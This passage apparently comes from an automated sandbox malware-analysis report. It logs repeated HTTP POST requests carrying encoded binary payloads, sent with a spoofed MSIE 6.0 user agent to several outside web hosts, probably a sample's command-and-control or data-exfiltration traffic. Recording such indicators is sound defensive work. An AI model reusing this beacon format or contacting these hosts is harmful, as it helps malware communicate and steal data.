42 48 4b 74 65 42 6f 46 59 68 31 48 2f 4b 34 4a 63 4d 67 65 73 79 55 57 43 53 64 57 32 71 4d 50 35 57 31 39 76 51 52 61 56 4f 74 74 50 47 41 72 72 52 74 68 56 38 6b 4b 45 4f 6f 6d 7a 37 42 4a 4f 4f 6f 56 63 54 71 61 4e 2b 65 31 4c 43 74 39 44 33 70 4e 49 57 64 4a 6e 62 73 4a 69 4a 66 46 6f 6b 78 57 51 51 41 32 30 64 7a 41 4e 37 76 75 6e 44 49 46 43 64 6c 69 79 4b 75 2b 49 47 4b 37 75 79 51 41 71 6b 46 49 36 64 53 65 64 39 6f 53 63 65 49 4c Data Ascii: +MSvEWu7oGcUbhhsQhm419RULhAxUi8Az6O0vjYHLJvTTjB9GKbelOMKuCJk5hv17onj/3xeGdME2Sqn2GCECeCb8HA7g2ddIccVz/P1gAp6/C49rkRGQB/FuIvnUYBBTx/QAssBTVbaTqcGeIfuokgb8cQUKgF++pN/XfkyH7ChvBctE3duZ2jknpMnS22UlGfZRPWLLcAuASmZdhzfmFOkTLp4lGiD1/o+pJiLA8VIuefh91pF4CfcuiH9sqOlxjrrQz/t4TWdaz/WD5zEipKHJ0m7FGRGPAQP7HXhda4gRjh36/J+3GbV04zGG0ksIj3wDI5NX63sPB15iQ6hCPpEckAuDgUcScQp84Li9MI0edLVPooFQZRvHQA/VXBULqzDxtEylpDwMoQEDGSHBHKteBoFYh1H/K4JcMgesyUWCSdW2qMP5W19vQRaVOttPGArrRthV8kKEOomz7BJOOoVcTqaN+e1LCt9D3pNIWdJnbsJiJfFokxWQQA20dzAN7vunDIFCdliyKu+IGK7uyQAqkFI6dSed9oSceIL
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 55 47 7a 69 79 48 4f 75 70 6d 66 30 54 6f 4f 74 75 71 47 69 38 68 79 6c 4d 68 6e 5a 6c 57 73 45 56 30 4d 6d 52 35 36 53 45 72 59 2b 2b 56 75 63 50 56 6c 44 63 52 47 4a 71 69 73 79 68 5a 79 50 69 6e 46 6c 6a 48 6e 67 6b 42 4f 39 57 2b 70 53 43 6c 74 58 43 74 50 59 6d 50 73 5a 65 67 4e 71 75 62 57 44 5a 46 59 75 56 59 39 54 34 74 4d 52 62 6e 57 6d 5a 6d 41 6d 68 6c 2f 75 6b 58 77 65 71 68 36 4b 6a 56 63 6d 62 6f 35 4b 48 45 38 49 73 36 32 54 44 53 34 65 6f 50 37 58 61 6f 6e 73 35 49 37 37 6f 58 44 42 56 6b 6c 48 75 52 34 30 48 35 76 6c 2b 53 42 64 51 61 50 73 39 32 62 45 31 69 33 77 42 56 39 55 5a 4d 31 51 79 38 45 2b 6a 32 4e 44 45 77 2f 56 37 68 51 57 54 77 4b 5a 4d 46 61 50 66 4d 5a 6b 61 31 2f 4c 66 57 34 47 35 31 41 41 4b 63 49 7a 4f 69 6a 6e 55 71 36 42 4d 68 56 50 61 50 62 6c 50 53 4f 44 5a 41 43 32 35 4e 6d 63 78 68 68 69 4f 6c 42 42 39 35 61 41 57 33 72 61 64 7a 44 63 41 64 58 62 53 57 70 4d 79 53 41 6e 65 4d 39 49 6f 46 55 34 36 37 47 64 63 66 64 45 44 38 6d 34 71 65 64 64 6d 74 43 32 4f 6b 65 78 37 77 57 78 6c 71 7a 63 31 38 36 6a 68 59 46 50 31 46 47 2f 7a 56 69 77 44 6d 32 38 6d 69 56 4d 63 54 6a 56 32 33 31 76 31 36 32 6b 36 44 6e 6d 64 78 47 61 72 39 50 4f 42 70 35 32 66 2b 52 42 30 50 59 62 4d 74 44 46 73 4a 57 5a 47 44 4f 44 6f 4f 77 48 72 42 34 68 51 5a 4a 77 47 69 58 68 6c 5a 79 49 46 42 42 78 4d 63 43 50 74 34 68 79 2b 6c 35 4e 37 2b 6d 72 74 67 48 44 69 7a 70 65 54 6e 4d 76 48 71 49 69 6e 4d 49 36 6d 58 62 47 47 68 36 46 69 4f 73 36 62 48 48 44 31 4d 35 37 56 58 43 64 53 30 43 69 66 65 76 56 56 67 30 42 7a 6c 46 32 61 6b 61 73 43 61 72 34 48 62 50 62 4f 51 5a 73 44 2f 54 4f 4c 4c 70 62 37 55 66 56 55 43 71 69 57 64 44 55 73 49 4c 33 36 68 59 5a 57 50 6b 59 6d 45 35 4b 63 54 65 55 6d 65 6c 52 56 6b 35 52 37 72 5a 6c 69 4e 58 52 70 41 3d 3d Data Ascii: UGziyHOupmf0ToOtuqGi8hylMhnZlWsEV0MmR56SErY++VucPVlDcRGJqisyhZyPinFljHngkBO9W+pSCltXCtPYmPsZegNqubWDZFYuVY9T4tMRbnWmZmAmhl/ukXweqh6KjVcmbo5KHE8Is62TDS4eoP7Xaons5I77oXDBVklHuR40H5vl+SBdQaPs92bE1i3wBV9UZM1Qy8E+j2NDEw/V7hQWTwKZMFaPfMZka1/LfW4G51AAKcIzOijnUq6BMhVPaPblPSODZAC25NmcxhhiOlBB95aAW3radzDcAdXbSWpMySAneM9IoFU467GdcfdED8m4qeddmtC2Okex7wWxlqzc186jhYFP1FG/zViwDm28miVMcTjV231v162k6DnmdxGar9POBp52f+RB0PYbMtDFsJWZGDODoOwHrB4hQZJwGiXhlZyIFBBxMcCPt4hy+l5N7+mrtgHDizpeTnMvHqIinMI6mXbGGh6FiOs6bHHD1M57VXCdS0CifevVVg0BzlF2akasCar4HbPbOQZsD/TOLLpb7UfVUCqiWdDUsIL36hYZWPkYmE5KcTeUmelRVk5R7rZliNXRpA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 69 64 77 73 6b 49 49 32 6c 47 65 75 79 66 34 38 64 59 4e 66 33 77 58 66 4c 6f 61 53 72 45 4e 4f 31 69 53 4e 61 48 35 31 48 47 73 39 59 34 49 30 44 69 59 73 33 78 59 50 70 6d 6b 41 39 7a 76 63 43 6d 70 30 30 73 70 49 5a 35 58 6d 59 34 5a 39 32 6a 35 73 54 4e 4c 56 62 56 47 62 53 6b 73 37 6d 77 56 51 66 6e 72 76 2f 36 4d 44 73 34 30 69 53 31 57 41 73 71 69 70 59 65 48 67 42 79 48 42 63 49 32 64 43 6b 6c 48 59 56 4a 76 68 57 4e 6c 4d 49 38 36 41 39 6a 73 75 33 32 48 31 31 4d 64 55 34 55 37 34 63 4f 78 42 77 6e 72 65 70 58 6d 41 37 7a 6a 78 4f 62 4a 65 63 77 33 58 2f 4b 45 56 70 6e 57 53 52 34 41 4f 57 50 57 4d 64 70 68 47 51 6d 7a 41 71 72 73 61 56 31 4b 66 57 6f 50 35 54 71 78 72 31 70 79 55 6f 4b 6b 77 34 41 37 32 65 7a 38 65 63 4e 7a 78 58 39 35 31 53 64 4a 2b 39 2b 74 4b 5a 44 42 53 59 70 2b 2f 55 54 68 70 73 47 73 37 72 6c 38 42 4e 7a 79 67 59 6f 58 35 67 4b 56 4c 52 57 34 56 4d 4c 47 66 52 54 65 52 63 70 6a 4c 6f 47 6f 70 75 54 46 53 37 77 39 5a 42 32 49 6f 77 49 2f 53 41 42 68 4b 66 6d 2f 58 54 48 4a 45 41 30 48 33 64 73 47 2b 39 2b 62 70 42 67 74 74 4d 59 71 2f 50 57 4c 62 4c 66 36 2f 38 68 4a 36 69 33 57 66 6e 6a 71 52 70 45 38 2b 30 52 68 70 69 57 67 46 51 6a 71 39 75 35 42 33 63 5a 71 48 73 31 6a 70 47 74 73 4b 57 45 79 46 44 4e 4b 4d 4d 37 76 44 62 43 4b 41 39 7a 53 4f 57 4d 68 67 58 73 79 72 70 33 41 67 45 74 68 79 2b 68 74 5a 61 4e 38 6d 63 69 6d 69 73 70 6d 6a 72 59 51 70 56 51 33 61 50 64 5a 61 2b 4e 75 64 31 65 69 50 58 73 48 33 50 62 54 75 4d 53 4d 79 71 37 79 73 49 67 46 49 2b 61 36 79 43 59 75 63 61 73 30 33 6f 59 39 62 51 36 59 76 74 39 2f 4e 34 63 63 74 4c 34 6a 6e 6a 32 51 70 65 31 41 30 41 31 71 6c 42 56 53 Data Ascii: idwskII2lGeuyf48dYNf3wXfLoaSrENO1iSNaH51HGs9Y4I0DiYs3xYPpmkA9zvcCmp00spIZ5XmY4Z92j5sTNLVbVGbSks7mwVQfnrv/6MDs40iS1WAsqipYeHgByHBcI2dCklHYVJvhWNlMI86A9jsu32H11MdU4U74cOxBwnrepXmA7zjxObJecw3X/KEVpnWSR4AOWPWMdphGQmzAqrsaV1KfWoP5Tqxr1pyUoKkw4A72ez8ecNzxX951SdJ+9+tKZDBSYp+/UThpsGs7rl8BNzygYoX5gKVLRW4VMLGfRTeRcpjLoGopuTFS7w9ZB2IowI/SABhKfm/XTHJEA0H3dsG+9+bpBgttMYq/PWLbLf6/8hJ6i3WfnjqRpE8+0RhpiWgFQjq9u5B3cZqHs1jpGtsKWEyFDNKMM7vDbCKA9zSOWMhgXsyrp3AgEthy+htZaN8mcimispmjrYQpVQ3aPdZa+Nud1eiPXsH3PbTuMSMyq7ysIgFI+a6yCYucas03oY9bQ6Yvt9/N4cctL4jnj2Qpe1A0A1qlBVS
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 2b 4d 53 76 45 57 75 37 6f 47 63 55 62 68 68 73 51 68 6d 34 31 39 52 55 4c 68 41 78 55 69 38 41 7a 36 4f 30 76 6a 59 48 4c 4a 76 54 54 6a 42 39 47 4b 62 65 6c 4f 4d 4b 75 43 4a 6b 35 68 76 31 37 6f 6e 6a 2f 33 78 65 47 64 4d 45 32 53 71 6e 32 47 43 45 43 65 43 62 38 48 41 37 67 32 64 64 49 63 63 56 7a 2f 50 31 67 41 70 36 2f 43 34 39 72 6b 52 47 51 42 2f 46 75 49 76 6e 55 59 42 42 54 78 2f 51 41 73 73 42 54 56 62 61 54 71 63 47 65 49 66 75 6f 6b 67 62 38 63 51 55 4b 67 46 2b 2b 70 4e 2f 58 66 6b 79 48 37 43 68 76 42 63 74 45 33 64 75 5a 32 6a 6b 6e 70 4d 6e 53 32 32 55 6c 47 66 5a 52 50 57 4c 4c 63 41 75 41 53 6d 5a 64 68 7a 66 6d 46 4f 6b 54 4c 70 34 6c 47 69 44 31 2f 6f 2b 70 4a 69 4c 41 38 56 49 75 65 66 68 39 31 70 46 34 43 66 63 75 69 48 39 73 71 4f 6c 78 6a 72 72 51 7a 2f 74 34 54 57 64 61 7a 2f 57 44 35 7a 45 69 70 4b 48 4a 30 6d 37 46 47 52 47 50 41 51 50 37 48 58 68 64 61 34 67 52 6a 68 33 36 2f 4a 2b 33 47 62 56 30 34 7a 47 47 30 6b 73 49 6a 33 77 44 49 35 4e 58 36 33 73 50 42 31 35 69 51 36 68 43 50 70 45 63 6b 41 75 44 67 55 63 53 63 51 70 38 34 4c 69 39 4d 49 30 65 64 4c 56 50 6f 6f 46 51 5a 52 76 48 51 41 2f 56 58 42 55 4c 71 7a 44 78 74 45 79 6c 70 44 77 4d 6f 51 45 44 47 53 48 42 48 4b 74 65 42 6f 46 59 68 31 48 2f 4b 34 4a 63 4d 67 65 73 79 55 57 43 53 64 57 32 71 4d 50 35 57 31 39 76 51 52 61 56 4f 74 74 50 47 41 72 72 52 74 68 56 38 6b 4b 45 4f 6f 6d 7a 37 42 4a 4f 4f 6f 56 63 54 71 61 4e 2b 65 31 4c 43 74 39 44 33 70 4e 49 57 64 4a 6e 62 73 4a 69 4a 66 46 6f 6b 78 57 51 51 41 32 30 64 7a 41 4e 37 76 75 6e 44 49 46 43 64 6c 69 79 4b 75 2b 49 47 4b 37 75 79 51 41 71 6b 46 49 36 64 53 65 64 39 6f 53 63 65 49 4c Data Ascii: +MSvEWu7oGcUbhhsQhm419RULhAxUi8Az6O0vjYHLJvTTjB9GKbelOMKuCJk5hv17onj/3xeGdME2Sqn2GCECeCb8HA7g2ddIccVz/P1gAp6/C49rkRGQB/FuIvnUYBBTx/QAssBTVbaTqcGeIfuokgb8cQUKgF++pN/XfkyH7ChvBctE3duZ2jknpMnS22UlGfZRPWLLcAuASmZdhzfmFOkTLp4lGiD1/o+pJiLA8VIuefh91pF4CfcuiH9sqOlxjrrQz/t4TWdaz/WD5zEipKHJ0m7FGRGPAQP7HXhda4gRjh36/J+3GbV04zGG0ksIj3wDI5NX63sPB15iQ6hCPpEckAuDgUcScQp84Li9MI0edLVPooFQZRvHQA/VXBULqzDxtEylpDwMoQEDGSHBHKteBoFYh1H/K4JcMgesyUWCSdW2qMP5W19vQRaVOttPGArrRthV8kKEOomz7BJOOoVcTqaN+e1LCt9D3pNIWdJnbsJiJfFokxWQQA20dzAN7vunDIFCdliyKu+IGK7uyQAqkFI6dSed9oSceIL
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 31 48 73 35 72 62 6f 59 72 6d 65 6c 72 32 54 48 58 56 42 4b 53 50 31 52 30 57 67 71 39 79 49 71 6a 6f 37 50 74 6d 37 4c 45 44 67 76 41 6f 65 47 33 62 53 64 67 75 2f 5a 5a 49 63 66 75 56 4b 43 39 38 38 68 62 73 41 4d 35 71 6d 63 63 74 61 73 2b 58 65 76 50 44 69 46 42 38 64 57 56 71 78 59 76 49 43 74 4b 4e 64 6b 49 76 61 4b 5a 53 61 57 47 47 47 55 6c 56 71 6b 43 37 6c 54 72 78 65 54 57 68 54 74 2b 68 6f 47 4f 38 49 79 45 31 37 52 72 55 4b 4b 58 50 67 42 35 36 65 54 6c 6a 4a 43 56 4a 6c 47 59 47 72 54 42 71 42 78 45 6d 34 56 66 4d 64 50 73 45 63 65 63 77 31 76 6a 44 46 37 58 39 36 64 4e 37 37 7a 5a 4f 54 53 6e 58 7a 7a 51 36 52 7a 6b 61 31 4b 65 6c 56 50 2f 76 35 74 2b 38 50 74 48 45 61 64 6c 4a 68 35 62 68 4c 70 68 4d 41 49 4f 59 4a 36 61 48 69 50 39 63 6f 65 34 75 6c 53 6c 33 6f 6d 70 6a 6d 6c 77 46 41 7a 43 65 47 39 56 4e 6f 33 58 2b 48 4a 6a 47 79 47 4f 67 56 77 79 44 71 39 2f 37 75 55 34 63 4b 77 30 74 6b 63 78 70 58 54 74 31 43 72 6e 7a 39 5a 33 45 73 31 37 6d 70 79 43 39 48 55 43 76 77 70 50 72 38 56 31 70 43 4d 79 4a 79 54 4a 66 31 71 6e 6f 34 54 6f 30 66 76 50 6b 58 73 52 5a 73 45 2f 49 69 41 44 33 6c 38 6e 44 64 79 78 6a 52 6e 48 37 72 59 2f 71 34 53 44 6e 35 45 6a 75 47 72 2b 6a 41 38 74 74 43 78 6d 4e 51 49 35 4e 32 6e 59 66 2f 49 6c 76 4c 30 39 36 34 67 33 35 6b 54 4c 61 4d 53 45 6c 30 6b 61 55 39 41 63 54 37 54 63 68 50 74 79 48 53 4a 6f 47 71 47 30 30 4d 57 77 2f 46 76 4a 42 47 35 38 41 6c 66 6b 68 31 67 4b 51 46 41 2b 41 54 66 31 68 48 31 6a 63 32 74 66 71 30 72 36 49 75 35 35 44 41 71 2b 41 55 77 6c 59 68 66 47 54 7a 31 55 45 78 78 54 63 30 6c 2f 71 43 30 7a 76 35 65 4c 79 53 4b 44 59 75 43 47 6c 69 73 Data Ascii: 1Hs5rboYrmelr2THXVBKSP1R0Wgq9yIqjo7Ptm7LEDgvAoeG3bSdgu/ZZIcfuVKC988hbsAM5qmcctas+XevPDiFB8dWVqxYvICtKNdkIvaKZSaWGGGUlVqkC7lTrxeTWhTt+hoGO8IyE17RrUKKXPgB56eTljJCVJlGYGrTBqBxEm4VfMdPsEcecw1vjDF7X96dN77zZOTSnXzzQ6Rzka1KelVP/v5t+8PtHEadlJh5bhLphMAIOYJ6aHiP9coe4ulSl3ompjmlwFAzCeG9VNo3X+HJjGyGOgVwyDq9/7uU4cKw0tkcxpXTt1Crnz9Z3Es17mpyC9HUCvwpPr8V1pCMyJyTJf1qno4To0fvPkXsRZsE/IiAD3l8nDdyxjRnH7rY/q4SDn5EjuGr+jA8ttCxmNQI5N2nYf/IlvL0964g35kTLaMSEl0kaU9AcT7TchPtyHSJoGqG00MWw/FvJBG58Alfkh1gKQFA+ATf1hH1jc2tfq0r6Iu55DAq+AUwlYhfGTz1UExxTc0l/qC0zv5eLySKDYuCGlis
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 36 73 64 30 54 48 70 45 73 32 65 4d 57 4b 69 75 48 51 6d 38 6e 62 30 33 39 42 6e 71 2f 5a 6f 61 54 70 62 33 30 62 5a 7a 64 2b 61 67 42 65 71 48 34 61 32 6c 32 48 73 6e 44 77 34 68 2f 54 76 47 62 50 2b 34 34 72 6e 6b 37 63 6d 75 76 69 62 72 34 4d 7a 55 43 31 4c 49 65 6e 63 51 4c 72 6c 37 66 54 78 4f 39 6f 6b 34 2f 7a 72 4a 67 42 6a 33 6b 4e 51 66 45 50 68 4e 6e 57 34 65 37 67 37 54 4a 34 43 42 6e 63 6a 72 44 73 5a 76 39 50 6c 58 64 56 4f 39 6f 71 6e 63 68 31 72 58 50 66 62 58 36 72 73 68 52 54 34 41 4b 56 2f 50 78 47 70 5a 37 6b 6e 7a 34 37 45 42 33 72 33 50 65 4d 65 46 31 5a 48 33 58 31 65 77 45 5a 61 79 73 57 51 34 41 52 76 4c 34 64 78 43 65 6d 7a 49 46 36 76 45 44 78 49 50 63 34 4d 69 4e 69 31 39 70 79 51 63 37 4a 4b 6d 30 52 32 66 5a 32 41 62 68 66 62 52 50 6a 6a 67 32 56 50 73 45 7a 74 42 5a 6a 32 69 62 70 4b 4b 4f 78 61 6b 4b 47 61 79 68 73 79 69 38 70 34 7a 36 38 49 6c 6d 49 6d 45 56 47 6c 45 38 32 66 77 49 44 43 6e 53 4c 55 2f 44 69 76 47 64 4b 6f 64 68 53 59 35 34 37 66 46 6e 39 6d 41 56 37 64 66 7a 74 43 59 4a 4a 4c 32 42 42 47 37 53 56 33 68 55 4f 30 52 35 67 48 55 5a 34 6c 61 4c 44 6a 6b 36 5a 63 76 44 2f 64 51 35 69 70 78 53 6a 74 43 78 68 30 50 70 44 4e 43 2f 75 4e 44 6a 6a 4a 67 6a 6d 74 61 4e 77 59 74 38 71 6f 4e 42 39 47 59 47 68 45 56 44 4f 41 67 79 4d 49 38 35 70 7a 2f 2b 35 5a 76 6d 55 38 6a 2f 51 69 73 6a 37 51 66 45 72 34 42 75 31 38 34 6a 38 30 41 42 73 62 79 5a 7a 58 4e 2b 7a 70 79 71 4d 76 56 32 43 42 38 46 7a 51 62 6c 2f 62 4a 57 32 71 4d 46 4f 30 6c 6e 77 41 56 6e 43 4a 73 45 47 6d 48 59 6a 33 4c 49 6c 33 63 2b 5a 2f 34 6d 2b 51 39 30 4c 31 68 47 44 59 66 33 62 57 54 4b 41 3d 3d Data Ascii: 6sd0THpEs2eMWKiuHQm8nb039Bnq/ZoaTpb30bZzd+agBeqH4a2l2HsnDw4h/TvGbP+44rnk7cmuvibr4MzUC1LIencQLrl7fTxO9ok4/zrJgBj3kNQfEPhNnW4e7g7TJ4CBncjrDsZv9PlXdVO9oqnch1rXPfbX6rshRT4AKV/PxGpZ7knz47EB3r3PeMeF1ZH3X1ewEZaysWQ4ARvL4dxCemzIF6vEDxIPc4MiNi19pyQc7JKm0R2fZ2AbhfbRPjjg2VPsEztBZj2ibpKKOxakKGayhsyi8p4z68IlmImEVGlE82fwIDCnSLU/DivGdKodhSY547fFn9mAV7dfztCYJJL2BBG7SV3hUO0R5gHUZ4laLDjk6ZcvD/dQ5ipxSjtCxh0PpDNC/uNDjjJgjmtaNwYt8qoNB9GYGhEVDOAgyMI85pz/+5ZvmU8j/Qisj7QfEr4Bu184j80ABsbyZzXN+zpyqMvV2CB8FzQbl/bJW2qMFO0lnwAVnCJsEGmHYj3LIl3c+Z/4m+Q90L1hGDYf3bWTKA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 55 47 7a 69 79 48 4f 75 70 6d 66 30 54 6f 4f 74 75 71 47 69 38 68 79 6c 4d 68 6e 5a 6c 57 73 45 56 30 4d 6d 52 35 36 53 45 72 59 2b 2b 56 75 63 50 56 6c 44 63 52 47 4a 71 69 73 79 68 5a 79 50 69 6e 46 6c 6a 48 6e 67 6b 42 4f 39 57 2b 70 53 43 6c 74 58 43 74 50 59 6d 50 73 5a 65 67 4e 71 75 62 57 44 5a 46 59 75 56 59 39 54 34 74 4d 52 62 6e 57 6d 5a 6d 41 6d 68 6c 2f 75 6b 58 77 65 71 68 36 4b 6a 56 63 6d 62 6f 35 4b 48 45 38 49 73 36 32 54 44 53 34 65 6f 50 37 58 61 6f 6e 73 35 49 37 37 6f 58 44 42 56 6b 6c 48 75 52 34 30 48 35 76 6c 2b 53 42 64 51 61 50 73 39 32 62 45 31 69 33 77 42 56 39 55 5a 4d 31 51 79 38 45 2b 6a 32 4e 44 45 77 2f 56 37 68 51 57 54 77 4b 5a 4d 46 61 50 66 4d 5a 6b 61 31 2f 4c 66 57 34 47 35 31 41 41 4b 63 49 7a 4f 69 6a 6e 55 71 36 42 4d 68 56 50 61 50 62 6c 50 53 4f 44 5a 41 43 32 35 4e 6d 63 78 68 68 69 4f 6c 42 42 39 35 61 41 57 33 72 61 64 7a 44 63 41 64 58 62 53 57 70 4d 79 53 41 6e 65 4d 39 49 6f 46 55 34 36 37 47 64 63 66 64 45 44 38 6d 34 71 65 64 64 6d 74 43 32 4f 6b 65 78 37 77 57 78 6c 71 7a 63 31 38 36 6a 68 59 46 50 31 46 47 2f 7a 56 69 77 44 6d 32 38 6d 69 56 4d 63 54 6a 56 32 33 31 76 31 36 32 6b 36 44 6e 6d 64 78 47 61 72 39 50 4f 42 70 35 32 66 2b 52 42 30 50 59 62 4d 74 44 46 73 4a 57 5a 47 44 4f 44 6f 4f 77 48 72 42 34 68 51 5a 4a 77 47 69 58 68 6c 5a 79 49 46 42 42 78 4d 63 43 50 74 34 68 79 2b 6c 35 4e 37 2b 6d 72 74 67 48 44 69 7a 70 65 54 6e 4d 76 48 71 49 69 6e 4d 49 36 6d 58 62 47 47 68 36 46 69 4f 73 36 62 48 48 44 31 4d 35 37 56 58 43 64 53 30 43 69 66 65 76 56 56 67 30 42 7a 6c 46 32 61 6b 61 73 43 61 72 34 48 62 50 62 4f 51 5a 73 44 2f 54 4f 4c 4c 70 62 37 55 66 56 55 43 71 69 57 64 44 55 73 49 4c 33 36 68 59 5a 57 50 6b 59 6d 45 35 4b 63 54 65 55 6d 65 6c 52 56 6b 35 52 37 72 5a 6c 69 4e 58 52 70 41 3d 3d Data Ascii: UGziyHOupmf0ToOtuqGi8hylMhnZlWsEV0MmR56SErY++VucPVlDcRGJqisyhZyPinFljHngkBO9W+pSCltXCtPYmPsZegNqubWDZFYuVY9T4tMRbnWmZmAmhl/ukXweqh6KjVcmbo5KHE8Is62TDS4eoP7Xaons5I77oXDBVklHuR40H5vl+SBdQaPs92bE1i3wBV9UZM1Qy8E+j2NDEw/V7hQWTwKZMFaPfMZka1/LfW4G51AAKcIzOijnUq6BMhVPaPblPSODZAC25NmcxhhiOlBB95aAW3radzDcAdXbSWpMySAneM9IoFU467GdcfdED8m4qeddmtC2Okex7wWxlqzc186jhYFP1FG/zViwDm28miVMcTjV231v162k6DnmdxGar9POBp52f+RB0PYbMtDFsJWZGDODoOwHrB4hQZJwGiXhlZyIFBBxMcCPt4hy+l5N7+mrtgHDizpeTnMvHqIinMI6mXbGGh6FiOs6bHHD1M57VXCdS0CifevVVg0BzlF2akasCar4HbPbOQZsD/TOLLpb7UfVUCqiWdDUsIL36hYZWPkYmE5KcTeUmelRVk5R7rZliNXRpA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 36 73 64 30 54 48 70 45 73 32 65 4d 57 4b 69 75 48 51 6d 38 6e 62 30 33 39 42 6e 71 2f 5a 6f 61 54 70 62 33 30 62 5a 7a 64 2b 61 67 42 65 71 48 34 61 32 6c 32 48 73 6e 44 77 34 68 2f 54 76 47 62 50 2b 34 34 72 6e 6b 37 63 6d 75 76 69 62 72 34 4d 7a 55 43 31 4c 49 65 6e 63 51 4c 72 6c 37 66 54 78 4f 39 6f 6b 34 2f 7a 72 4a 67 42 6a 33 6b 4e 51 66 45 50 68 4e 6e 57 34 65 37 67 37 54 4a 34 43 42 6e 63 6a 72 44 73 5a 76 39 50 6c 58 64 56 4f 39 6f 71 6e 63 68 31 72 58 50 66 62 58 36 72 73 68 52 54 34 41 4b 56 2f 50 78 47 70 5a 37 6b 6e 7a 34 37 45 42 33 72 33 50 65 4d 65 46 31 5a 48 33 58 31 65 77 45 5a 61 79 73 57 51 34 41 52 76 4c 34 64 78 43 65 6d 7a 49 46 36 76 45 44 78 49 50 63 34 4d 69 4e 69 31 39 70 79 51 63 37 4a 4b 6d 30 52 32 66 5a 32 41 62 68 66 62 52 50 6a 6a 67 32 56 50 73 45 7a 74 42 5a 6a 32 69 62 70 4b 4b 4f 78 61 6b 4b 47 61 79 68 73 79 69 38 70 34 7a 36 38 49 6c 6d 49 6d 45 56 47 6c 45 38 32 66 77 49 44 43 6e 53 4c 55 2f 44 69 76 47 64 4b 6f 64 68 53 59 35 34 37 66 46 6e 39 6d 41 56 37 64 66 7a 74 43 59 4a 4a 4c 32 42 42 47 37 53 56 33 68 55 4f 30 52 35 67 48 55 5a 34 6c 61 4c 44 6a 6b 36 5a 63 76 44 2f 64 51 35 69 70 78 53 6a 74 43 78 68 30 50 70 44 4e 43 2f 75 4e 44 6a 6a 4a 67 6a 6d 74 61 4e 77 59 74 38 71 6f 4e 42 39 47 59 47 68 45 56 44 4f 41 67 79 4d 49 38 35 70 7a 2f 2b 35 5a 76 6d 55 38 6a 2f 51 69 73 6a 37 51 66 45 72 34 42 75 31 38 34 6a 38 30 41 42 73 62 79 5a 7a 58 4e 2b 7a 70 79 71 4d 76 56 32 43 42 38 46 7a 51 62 6c 2f 62 4a 57 32 71 4d 46 4f 30 6c 6e 77 41 56 6e 43 4a 73 45 47 6d 48 59 6a 33 4c 49 6c 33 63 2b 5a 2f 34 6d 2b 51 39 30 4c 31 68 47 44 59 66 33 62 57 54 4b 41 3d 3d Data Ascii: 6sd0THpEs2eMWKiuHQm8nb039Bnq/ZoaTpb30bZzd+agBeqH4a2l2HsnDw4h/TvGbP+44rnk7cmuvibr4MzUC1LIencQLrl7fTxO9ok4/zrJgBj3kNQfEPhNnW4e7g7TJ4CBncjrDsZv9PlXdVO9oqnch1rXPfbX6rshRT4AKV/PxGpZ7knz47EB3r3PeMeF1ZH3X1ewEZaysWQ4ARvL4dxCemzIF6vEDxIPc4MiNi19pyQc7JKm0R2fZ2AbhfbRPjjg2VPsEztBZj2ibpKKOxakKGayhsyi8p4z68IlmImEVGlE82fwIDCnSLU/DivGdKodhSY547fFn9mAV7dfztCYJJL2BBG7SV3hUO0R5gHUZ4laLDjk6ZcvD/dQ5ipxSjtCxh0PpDNC/uNDjjJgjmtaNwYt8qoNB9GYGhEVDOAgyMI85pz/+5ZvmU8j/Qisj7QfEr4Bu184j80ABsbyZzXN+zpyqMvV2CB8FzQbl/bJW2qMFO0lnwAVnCJsEGmHYj3LIl3c+Z/4m+Q90L1hGDYf3bWTKA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 76 50 36 72 72 58 45 63 72 6d 64 47 73 48 73 68 6b 47 75 6b 70 73 71 4a 4d 61 75 76 68 6e 68 53 4e 63 4b 71 36 6b 33 62 50 65 66 4d 53 33 59 43 41 55 69 6c 33 32 4c 32 6b 32 6e 65 79 61 6c 63 32 46 42 79 42 67 57 66 4c 30 65 55 69 33 72 67 65 6d 30 69 38 39 44 65 72 4a 63 4d 63 35 46 41 61 62 33 43 4f 38 56 41 6d 35 77 41 4b 33 4f 70 44 67 38 66 46 6e 62 35 53 54 4c 2f 42 75 58 75 50 32 66 39 41 58 2b 71 45 4a 6e 75 39 4d 41 45 36 42 43 43 59 78 77 48 79 36 30 6a 39 54 33 51 65 61 6c 51 51 55 48 4f 73 32 65 6c 67 67 6f 59 4a 39 54 61 32 4d 70 54 68 5a 31 6a 48 55 66 77 45 77 4e 75 71 65 6f 67 6c 2b 44 61 49 58 64 32 6e 49 54 37 62 